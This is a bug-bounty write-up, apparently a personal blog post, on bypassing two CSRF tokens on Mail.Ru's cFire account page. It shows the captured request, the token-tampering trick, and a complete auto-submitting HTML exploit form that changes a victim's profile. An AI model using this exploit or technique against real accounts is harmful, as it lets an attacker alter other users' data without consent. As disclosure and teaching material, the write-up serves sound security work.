How I bypassed multiple CSRF protections in Mail.Ru’s cFire

While I was pentesting many sub-domains of Mail.Ru at the same time, I came upon cfire.mail.ru – Since this one also had a user portal so it caught my eye!

I first started testing for Cross-Site Scripting issues in different  (GET/POST) parameters. While fuzzing them, I kept Burpsuite interception ON and it was capturing all the requests as a middle-ware proxy.

Whilst fuzzing the POST request sent to /account endpoint, this request came up:

POST /account/ HTTP/1.1
Host: cfire.mail.ru
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://cfire.mail.ru/account/
Cookie: <cookies-here.
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 167

signature=<csrf-token here>&firstname=Hacked&lastname=&bdday=0&bdmonth=0&bdyear=0&postindex=&country=&city=&address=&submit2=<another 9-character csrf-token here>

 

I found that there are two CSRF tokens:

  • Signature – with a long CSRF token
  • submit2 – with a length of nine, combined with numbers and alphabets

I tried bypassing both the CSRF protections by removing both parameters – It didn’t worked 🙁

After giving some time to it, I removed the value (not the parameter itself) of the signature parameter and tried replaying the request, it worked!

Now the next target for me was to bypass the submit2. I also tried removing the value of  submit2 – But this time, this technique didn’t worked! So I tried different ways of bypassing.

After like 15(ish) minutes. I tried replacing the 9-lengthened alpha-numeric value of  submit2 and modified it to: nine X values (i.e: XXXXXXXXX) And guess what? It worked. BOOM! Now we I made a HTML exploit for this specific CSRF issue which was something like this:

<html>
  <body>
    <form action="https://cfire.mail.ru/account/" method="POST" name="exploit">
      <input type="hidden" name="signature" value="" />
      <input type="hidden" name="firstname" value="Pwn3d" />
      <input type="hidden" name="lastname" value="" />
      <input type="hidden" name="bdday" value="0" />
      <input type="hidden" name="bdmonth" value="0" />
      <input type="hidden" name="bdyear" value="0" />
      <input type="hidden" name="postindex" value="" />
      <input type="hidden" name="country" value="" />
      <input type="hidden" name="city" value="" />
      <input type="hidden" name="address" value="" />
      <input type="hidden" name="submit2" value="XXXXXXXXX" />
    </form>
    <script>document.exploit.submit()</script>
  </body>
</html>

I tried this exploit in different cFire accounts. And it worked! So in simple words:

Removing the value of signature AND changing the value of submit2 to XXXXXXXXX will bypass both protections.

Thanks for reading till here, I hope you learned something. Happy Hacking!

Ahsan Tahir